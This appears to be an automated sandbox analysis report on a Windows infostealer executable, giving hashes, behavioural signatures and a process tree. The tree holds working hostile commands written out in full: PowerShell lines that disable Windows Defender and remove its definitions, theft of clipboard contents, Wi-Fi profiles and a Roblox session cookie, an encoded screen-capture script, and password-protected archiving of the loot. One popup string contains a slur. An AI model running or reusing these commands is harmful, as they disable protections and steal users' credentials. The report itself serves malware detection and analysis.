Resubmissions

05-11-2024 03:00

241105-dhtwfatfjl 10

05-11-2024 02:00

241105-cfat4ssbpc 10

05-11-2024 02:00

241105-ce5m4asfrr 10

05-11-2024 01:20

241105-bqgjza1jgz 10

05-11-2024 01:15

241105-bmjj6a1epb 10

Analysis

  • max time kernel
    12s
  • max time network
    13s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    05-11-2024 03:00

General

  • Target

    BYJ6K_Built.exe

  • Size

    7.4MB

  • MD5

    4d2f1d31e197b58186468092adb4505d

  • SHA1

    760cbb050f80760180e30b496498354aa3108505

  • SHA256

    5eb35313b56c46a5b9a57328aa26ca8e43731e39e3e1e6349c049343b7c585d6

  • SHA512

    b600776f4b6abc5c47ee62e4ca9259e91d2a1a1a7e1aa380db04bff62a251eb7ad5e168c1d1aab6be8f80d54724ef7d89fa0bb3dee57f4e7f68f66cd791e6bdf

  • SSDEEP

    98304:W6Si8TRhhurErvz81LpWjjUa50ZtPvYRt2e4GFNGjfzfbIbApJo4EwKhOh112mJw:W9/urErvI9pWjgfPvzm6gsFEF4f4

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\BYJ6K_Built.exe
    "C:\Users\Admin\AppData\Local\Temp\BYJ6K_Built.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2940
    • C:\Users\Admin\AppData\Local\Temp\BYJ6K_Built.exe
      "C:\Users\Admin\AppData\Local\Temp\BYJ6K_Built.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2924
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BYJ6K_Built.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1156
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BYJ6K_Built.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4920
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4432
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2208
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('niggafart.com', 0, 'ez rat skid', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2040
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('niggafart.com', 0, 'ez rat skid', 0+16);close()"
          4⤵
            PID:1036
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍    .scr'"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2392
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍    .scr'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1720
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:976
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2212
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3764
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2036
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2996
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2416
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Clipboard Data
          • Suspicious use of WriteProcessMemory
          PID:2788
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Clipboard Data
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4280
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4688
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1400
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4748
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:4064
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
            3⤵
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:2120
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              4⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:4780
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4756
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:1692
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4916
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              4⤵
                PID:5108
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4384
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:476
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lvxrfi2o\lvxrfi2o.cmdline"
                  5⤵
                    PID:4492
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC7D4.tmp" "c:\Users\Admin\AppData\Local\Temp\lvxrfi2o\CSCD22A7EE192814E47A6681F38E2B57C3.TMP"
                      6⤵
                        PID:2252
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4976
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:1272
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                    3⤵
                      PID:4808
                      • C:\Windows\system32\attrib.exe
                        attrib -r C:\Windows\System32\drivers\etc\hosts
                        4⤵
                        • Drops file in Drivers directory
                        • Views/modifies file attributes
                        PID:5076
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:820
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:2504
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                          3⤵
                            PID:1556
                            • C:\Windows\system32\attrib.exe
                              attrib +r C:\Windows\System32\drivers\etc\hosts
                              4⤵
                              • Drops file in Drivers directory
                              • Views/modifies file attributes
                              PID:252
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:1212
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:4624
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                3⤵
                                  PID:1292
                                  • C:\Windows\system32\tasklist.exe
                                    tasklist /FO LIST
                                    4⤵
                                    • Enumerates processes with tasklist
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3192
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:1840
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:1848
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      3⤵
                                        PID:1704
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          4⤵
                                            PID:1288
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                          3⤵
                                            PID:72
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                              4⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4064
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                            3⤵
                                              PID:1080
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                4⤵
                                                  PID:5108
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                  4⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4320
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "getmac"
                                                3⤵
                                                  PID:4788
                                                  • C:\Windows\system32\getmac.exe
                                                    getmac
                                                    4⤵
                                                      PID:4988
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29402\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\TNtAV.zip" *"
                                                    3⤵
                                                      PID:4040
                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI29402\rar.exe
                                                        C:\Users\Admin\AppData\Local\Temp\_MEI29402\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\TNtAV.zip" *
                                                        4⤵
                                                        • Executes dropped EXE
                                                        PID:2312
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                      3⤵
                                                        PID:2404
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic os get Caption
                                                          4⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4104
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                        3⤵
                                                          PID:3532
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic computersystem get totalphysicalmemory
                                                            4⤵
                                                              PID:2280
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                            3⤵
                                                              PID:4688
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic csproduct get uuid
                                                                4⤵
                                                                  PID:1224
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                3⤵
                                                                  PID:2288
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                    4⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:3192
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                  3⤵
                                                                    PID:220
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic path win32_VideoController get name
                                                                      4⤵
                                                                      • Detects videocard installed
                                                                      PID:2180
